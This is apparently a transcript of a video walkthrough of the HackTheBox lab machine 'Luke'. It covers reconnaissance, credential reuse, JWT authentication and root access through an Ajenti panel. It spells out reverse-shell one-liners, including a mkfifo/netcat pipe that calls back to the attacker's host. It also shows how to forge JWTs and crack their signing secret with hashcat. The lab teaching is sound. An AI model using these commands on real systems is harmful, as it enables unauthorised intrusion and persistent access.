What's going on YouTube? This is Ipsec, and we're doing Luke from HackTheBox. And the thing I really liked about this box is that you didn't throw any exploits to do it. And I know that sounds lame, but a lot of pen tests you'll find that you just do Recon, find a password in something like GitHub, try that password, log into something, do more Recon, try another password somewhere else, and after a few hops you finally get to what your goal is. And that's what this box actually shows. It's going to be a little bit short, so at the end of the video I'm planning on doing a little bit more like digging into JWT. We'll go into creating tokens and then probably also brute forcing them with Hashcat or something. So with that being said, let's just jump in. As always, we begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Luke, and then the IP address, which is 10.10.10.137. Can take some time to run, so I've already ran it. Looking at the results, there's a handful of ports open. The first one is FTP on port 21, and it's running VSFTPD version 3.03. If you did some Googling around on this version, you'd see it's relatively recent, so probably not worth your time looking into attacks against VSFTPD. That being said, it is configured to allow anonymous FTP logins, and is hosting a web app directory, so we should definitely return to this. The next thing we have is SSH on port 22. Nmap's telling us it's just open and believes this is SSH because the script executions failed. I'm guessing that it just went slow and timed out. So I'm going to start a SSH session to this box just to verify it is SSH listening on port 22. It should give us a login prompt to say something about host keys. The next thing we have is HTTP on port 80. It's running Apache and its host banner is saying it's FreeBSD. So if we have any local file inclusions or code executions, we should know that it's FreeBSD because the commands and file locations are slightly different than on Linux. And you can get some, I think, false negatives if you just do Linux paths on FreeBSD. For example, the web directory is generally not going to be in var www.html. So keep that in mind as we go on through this box. The next thing we have is port 3000 is open. It's also HTTP, and it's telling us it's the Node.js Express framework. And then we have port 8000 open, and that's telling us it's the Ajenti HTTP control panel. So the very first thing we want to do is look at this SSH connection. We see it is prompting us to accept a key, so this is most likely an SSH service. The next thing we want to do is FTP. So I'm just making the FTP directory to stay organized, and then do FTP 10.10.10.137. Username is anonymous because anonymous login is allowed. Password doesn't matter, I just typed anonymous. Doing dir, we can go into web app, and then there's only one file. It is called forshahiro.txt. So I'm going to get this file, and then we will look at its contents. So get out of FTP, cat the file, and it's telling us that it's a message to someone and saying, hey, the guy can give a little push by showing the sources of an actual website he created. Normally you should know where to look, but hurry up because I will delete them soon due to security policies. So the note really doesn't help all that much. So let's go over to the actual website. So 10.10.10.137. This is going to be the HTTP website. Then we got 10.10.137.3000 for the Node.js. And then we also have 8000 for Ajenti. So let's go open all those. And I messed up on the 8000. So we just get welcome to Luke Ltd, a landing page template redesigned for Bootstrap 4, and it's got about services contact, and there's nothing too interesting. So I'm just going to launch Gobuster. So we'll do Gobuster-H. Actually, don't have it installed. Let's just install this real quick. Now that Gobuster is installed, we can do -H to see the available modes. And it says there's dir mode for directory file brute forcing and DNS mode for subdomain, and then also virtual host. We want to do the directory brute forcing, and then we can do -H to see all the flags. First one is -U for URL, HTTP 10.10.10.137, then -W for word list, user share word list, then Gobuster directory list 2.3 medium is what I like using, and before we finish the command, let's just go back here. And if we try like index.php, we see it is not found. So if we do index.html, looks like this landing page is HTML. I tried PHP because if we look at the output of nmap, we have PHP installed with Apache. So I'm also going to search for PHP scripts with -x PHP to search all extensions. And then while that Gobuster runs, we can also test out the port 3000. This is just JSON output, so probably not PHP, and also it said Node.js framework and nmap. So let's just do the same Gobuster command, except we won't do the extension brute force. So we can copy this, and we probably should do an out file, so -o, we'll call this gobust port 80 root for root directory, and then we can call this gobust -port 3000 root, and we also have to change the URL to be port 3000. So now we got both of those Gobusters running. We have login.php on port 80, and we have login on port 3000 as well. So I'm going to go over to Cherry Tree and do interesting, and we'll say login pages port 80 login.php. Actually, I'm just trying to think of a good way to organize this. And then we just have /login on port 3000. And doing things like this just helps you when you start running into roadblocks, being like, oh, there's multiple login places, so I should try them all. We do have member, management, CSS, JS, and vendor. Look like they're probably just going to be source directories for random things like JavaScript or CSS files. Then we have config.php. So let's check out member and management. So if we do /member, oh, wrong page, /member here, we just get a open directory. If we do /management, we get a login prompt that says forbidden to visitors. Let's just try admin, and we failed. So go back to Cherry Tree, and we have /management, port 80, and this will be HTTP auth. So let's go back to the Gobust. The next thing is config.php. So let's try config.php. Puts everything on one line because we don't have the HTML for breaks. So I think that was Control-U. Yeah, Control-U to view the source. And then you get those line breaks. So we do have credentials to MySQL. Username root, password is this. So let's copy this. We can do probably a separate page for creds. And then root that, and we'll say this came from config.php. So the next thing we want is trying those creds everywhere. So let's go to login.php, and that director HTTPS? No. Okay. I just saw that icon. I guess Firefox puts that there when it's port 80. I thought that was like the self-signed cert icon. Try logging in with root and that incorrect information. We can try admin as well. Root and admin are pretty synonymous. Let's try /management, root, login, can't. So if you go to 3000 /login, we just get JSON saying, please authenticate. So there's no real data here to authenticate against. So we have to guess. So let's open up a new panel. We can just do curl for this. And first thing I want to do is http:// root : password. I don't have my clipboard anymore. Creds, copy, paste. Okay. At 10.10.10.137/login, port 3000/login, and we still get please auth. So it's not accepting HTTP authentication. Let's try -d for parameters, and since we're doing it this way, let's do a post request. And normally it's like user is equal to root or username and password is equal to the password. We get bad request. Since we don't have line breaks at the end, I'm just putting semicolon echo to make it a bit easier to read. If we put something that doesn't matter here, like please subscribe, we also get bad request. If we don't have anything, let's see what we get. Bad request. So anything with a post, we're just getting bad request. If we try username equals root and password equals this, which is another common variable for logins, we get forbidden. So now we know, well, this form probably accepts both username and password in a post request. It just doesn't accept this as the credentials. So we can try admin and log in with like default creds. Doesn't work. We can try admin and then the same password, and we get success, authentication, successful, and it gives us a big old token. So, meant to clear the screen. This looks like a JWT token. We can verify that by just trying base64 decodes. So we can see algorithm HS256, that's HMAC SHA-256, I believe. Type JWT, I think it's JSON web token. We can try the next thing. If we do echo-n, then base64-d, we get username, IAT, and expiration date. I'm guessing, well, username's easy to guess. IAT is probably when it was assigned, and expiration is when it expires. And then the very last thing of this JWT token is just a signature. So that's the HMAC thing. So if we do echo-n, base64-d, we get invalid input. So this whole token, where is it? Let's just do this again. We want admin and password like that. So essentially JWT is, oh wow, that's going to be horrible. It's broken up into 3 sections. The very first section is this, and this tells it information about the token. So things like algorithm used for assigning. Then the next portion of the token, this is going to be the actual data. And then the final is the signature. So that's the thing about a JWT token. And we got one of the user admin. So generally, I would try different attacks. Like I try to create a token with no signing and seeing if the web server will accept that. And we'll probably do that at the end of the video. We're not going to do that now because the token's admin. So why would we bother forging a token if we're already admin? We just have to figure out how to use the token. So let's just do a curl outside of login. And then we want to do -h for header. I think it's a capital H. And then put the token. So it's a authorization token, and then bearer, and then the token name. And we get welcome admin now. So this is just knowing how JWT tokens work. And if you've done offshore, you've probably seen my challenge that involves a JWT token. But I digress. Let's just keep on going. The other things on this, if we go back to Gobuster, we have login and users. So let's go to /users. And if we pipe this to JQ, which I probably don't have installed right now. So if we install JQ, and then we'll pipe it over to JQ, it'll give us a bit prettier output. You could also go to like Burp probably and install a extension to add headers. So I think if we went to like Burp's extender, add the store, add custom header, and we install this, we probably could do this. So add custom header, authorization, bearer, hard code value, like that. And then if we go to the page, I think it'll do that. So if we just go to slash, and then now tell a browser to go through Burp, we can turn intercept to off, refresh the page, authorization token not supplied. Maybe we have to add this to the scope. Yes. Auth token not supplied. Come on, I told you to add it. So maybe I don't know how this extension works. I don't use Burp extensions all that much. Thought that'd be easy. Let's see if there's any install instructions under extender. Let's see. Add custom header, project option. Oh, we have to add a session handling rule. Duh. So we go to project options, we can do session handling rules, add, and we can call this one add JWT token. The rule action, we want to invoke a Burp extension, add custom header, and then in scope, we want to change this to use a site scope. We could do custom scope and specify HTTP 10.10.10.137. Whoops. I'll just do site scope, but in this you can declare the exact scope. So now we're going to add the JWT token to everything on port 3000. If we refresh the page, we should have been doing that. If we go to target scope, we had already configured that. So I'm just going to go back to project options. We'll edit this, change this scope to be custom. And we'll do HTTP 10.10.10.137 port 3000. Okay. Parameter scope, that should be fine. Firefox is going through Burp. Auth token not supplied. Why is this not working? Hardcoded value. JWT token. Oh, we have to do it with proxy. So there we go. Refresh, and we see welcome admin. So it says it doesn't have that as a default because you can do some really bad things with this. For example, if we don't do a scope correctly, we could send a JWT token to every single website that we have proxied through Burp. So that's probably why that's not a default option. But happy that works. Now let's do it the easy way through the command line because I always prefer the command line. We have JQ installed now, so there we go. So we can just do -s for silence to get rid of this little header. And /users gives us a few things. So we can try the standard like API way, maybe users 1 to get us information about 1. No users admin, and we get name and password. So just interacting with generally how REST APIs work. I don't know really how to explain it. Look up REST APIs and you'll kind of figure that out. So let's go to this and we can do admin this, and we can just say port 3000. And let's dump all the users. So the next one will be Derry. So DERRY, this password, port 3000. Then Yuri, and then we'll do Dory as well. So Yuri, and these are all capitals. Usernames generally are not case sensitive, but always like being case sensitive when I don't know the answer. And then Dory. Port 3000. So now we have a handful of users. So we can try all our logins again. So if we go to /login.php, let's try everything. So admin, paste, Derry, Yuri, and then Dory. And we don't get anything. But this is why you should always take good notes, because we also have login on management, and we never did Ajenti port 8000. If you went all the way back here, we did have username password. So probably should have been testing logins there as well. But we forgot to put this in our notes, so we didn't do that. Always take good notes. So let's do management. I have a backslash there, but it shouldn't really change anything. Go to creds. Do admin. Nothing. Derry. Log in. And it actually succeeds. And it makes sense, because if we looked at all of this up top, we have Derry as the web admin. So the web admin can log in. The root user, which is admin, maybe he could log in to Ajenti because he's the root user. So we could also test that. Username admin, password is this. We can turn intercept off. We'll probably go up a little bit. Try root and that. And nothing. I don't think. Yeah, there we go. Invalid login. So let's check out what's in /management. There are 3 files: config.json, config.php, and login.php. This JSON has a lot of data. Config.php we've already seen. That's the same password. And login.php is this login. So let's take a look at the config.json. And reading through all these variables, this is Ajenti config. And we have a password here, and it's listening on port 8000. So let's try putting this password in. We'll try admin paste. And the next one we'll try is root. Invalid login, try root. And we get in. So first thing we do, go to creds, and we do root this, and this is Ajenti. Found in 80 config.json, just so we have an idea where it is. And then going through all this, there is one interesting thing that is called terminal. So let's do new terminal. Click here. If we do who am I, we can see we are root. If we go to cd/root, and then we got root.txt there. So wc-c root.txt. And we see 33 characters, which of course is MD5 sum, and then a line break. So let's just get a reverse shell real quick so we don't have to use this annoying panel. Dev TCP, my IP is by 10.10.14.3, and we'll always do port 9001. So let's do that. NC LVNP 9001. Send this command. Bad FD number. Bash-c. Bash is not found. Let's just make sure I did that bash reverse shell correctly. And it's always possible that it's not working because, well, it is FreeBSD and not Linux. Pentest Monkey, that's the one I want. Let's see. We'll just copy this. Go back to Luke. Paste. bash-i, I think I did that correctly. 10.10.14.3, 9001. Yep, I had done that correctly. So let's do which bash, env for environment. Let's see, what a good way to do a reverse shell. Do we have nc? Okay, sh is our shell. Which sh, ls-la, bin sh. So we're just bin sh. Which nc, and we have netcat. So we can try this. PHP. Where is netcat? I wonder if we have the -e. nc-e slash, where was sh? Bin sh 10.10.14.3, port 9001. Lib IPsec. Doesn't look like we have that -e option. So we default to this ugly command, and it doesn't look like I can paste in this terminal, which is annoying. So we'll do mkfifo /tempf. That worked. Cat tempf bin sh-i 2 and 1 nc 10.10.14.3 9001. Direct it back to the pipe. And there we go. We got a shell. So python-c import pty.spawn bin sh, which python3, which python. We don't have anything on this box. Which script, script -q dev null sh. Let's try this. sty raw -echo fg. Does not look like that worked. Export term is equal to xterm. Oh well, I can clear the screen. I don't have tab autocomplete. Maybe I did that script command wrong. Let's see. Oh, I have up. Let's see. L cat.config. Okay, I do have tab autocomplete. L just doesn't tab autocomplete to ls. So everything is right in the world. So we got a proper shell to this box. What else can we do? Let's look at JWT tokens. So let's figure out where the signing key is. So if we go cd/, there is node app. And you can also do like ps-aux, I think. Yeah. And then if you go through all this, you can see there is a node app running. You can also do netstat, get the PID, and do all that type of stuff. So there's 100 ways you can find where processes are. But let's just go in node app and config.js. We get the secret is world is full of developers. So let's go and do a little bit of pen testing on JWT knowledge. Make dir extra. So let's do pip3 install pyjwt to install the JWT library in Python. Looks like it is now installed. So we'll do this. Please sub.python. And I also have a Patreon if you want to support me there. So since we have pyjwt, we can just do import JWT. And then the way to create a JWT token is jwt.encode, and then you give it the contents of what you want. So we wanted username is equal to admin, and then it had an IAT, which I think is the assign time, is equal to, we'll do 0 and see if this works. And then it also had an expiration date, but let's not put an expiration date. And why would you want to do that? Maybe you want to do persistence. So if you did this, as long as they keep the same key, you'll always have a token that works. So the next variable is that. And then the algorithm, that was HS256. And remember, we saw that in the very first base64 parameter. So we got the JWT token there. If we print JWT token, Python 3, please sub. Let's do JWT token is equal to JWT token dot decode UTF-8. Just to get it so it doesn't treat it as a byte string. So there we go. We got this token. So let's see if the application is going to accept a infinite token. So where is my curl command? Curl, it's in terminal 3, which is a netcat session. So let's just redo that. HTTP 10.10.10.137/-h for header, authorization, bearer, paste the token, and we have to specify port 3000. And we get welcome admin. So we could try, let's always do, actually, let's just add it in our script to do this curl request. So please sub, we'll do import requests, and then we'll do headers is equal to authorization, and then an F string bearer, encoded, JWT underscore token. Okay. So we can print what the token looks like, and then we also want to do r is equal to request.get, and then the URL. And for once, I didn't forget the port. So headers is equal to headers, like that, print r.text. There we go. So now we got the token and the username. So let's try changing the username. Let's create a token with IPsec and go. And we still get welcome admin. So it's just checking if the token is valid. If we went to this second piece, we could see this base64 is completely different. So echo-n, base64-d, we can see the token is like this. It says invalid input because this is URL encoded base64, I think, which just doesn't do the padding. There we go. So it doesn't do the padding, and it changes, I think, plus to period. So it changes the characters a little bit and gets rid of the equal padding at the end. But there's that token. An attack on JWT tokens is if the application just does like a JWT decode blindly and doesn't check for keys, sometimes you can log in by just removing the algorithm and forging your token that way. So if we change, before I do that, let's just copy the line and comment it out. But if you change the key to none and the algorithm to none, now we're not going to sign the token. So if we don't sign the token, what happens? We get a token is not valid message. So this time it didn't work. Sometimes you'll find JWT applications that will still accept that depending how the developer has it coded. The final thing we can do, if you want to look at remember the first block is the header. So if you do echo-n, base64-d, echo. So you can see type is JWT, algorithm is none. The last thing we could do is probably brute force this. So if we go back here and run this and just grab the token, we can go over to Hashcat. And Kraken is just a machine I have. I hate doing any type of cracking in a VM, especially on the machine I'm recording from, because it's a CPU-intensive process and great for lag and all that type of stuff. So I always just remote elsewhere to do cracking. But let's go into the Hashcat folder. We can do v hashes slash JWT dot Luke, paste the token, and then do dot slash hashcat dash dash example hashes, and then grep dash I for JWT. We see it is there. If we do dash B for before 1, we can see its mode 16500. So if I do less now, search for 16500, we see it doesn't give us an example, but it tells us it can crack JSON web tokens. So if we do dash hashcat dash M 16500, and before we do that, we have to create a password list. So we'll do vim please support on Patreon, and just create a bunch of passwords. So we'll do test, like a bunch of things, and then what was it? The world is full of developers, and then do hashcat dash M 16500 hashes JWT.Luke, and then the password file. And then let this run, and it should tell us which one is the valid password. If you brute force the secret, then you can just forge all the JWT tokens you want and say you're admin anyways. Guess queue, it did not crack. It's probably my fault. I probably put the world is full of developers and made it like a sentence like that. Yep. So there we go. Let's run this again. And you saw up top, it said it had cracked it. And you can also do, I just recently found out about this, dash dash show, and hashcat will show you the password. So there we go. We have that long hash and then the secret. So that was the box. Hope you guys enjoyed it. Take care, and we'll see you all next week.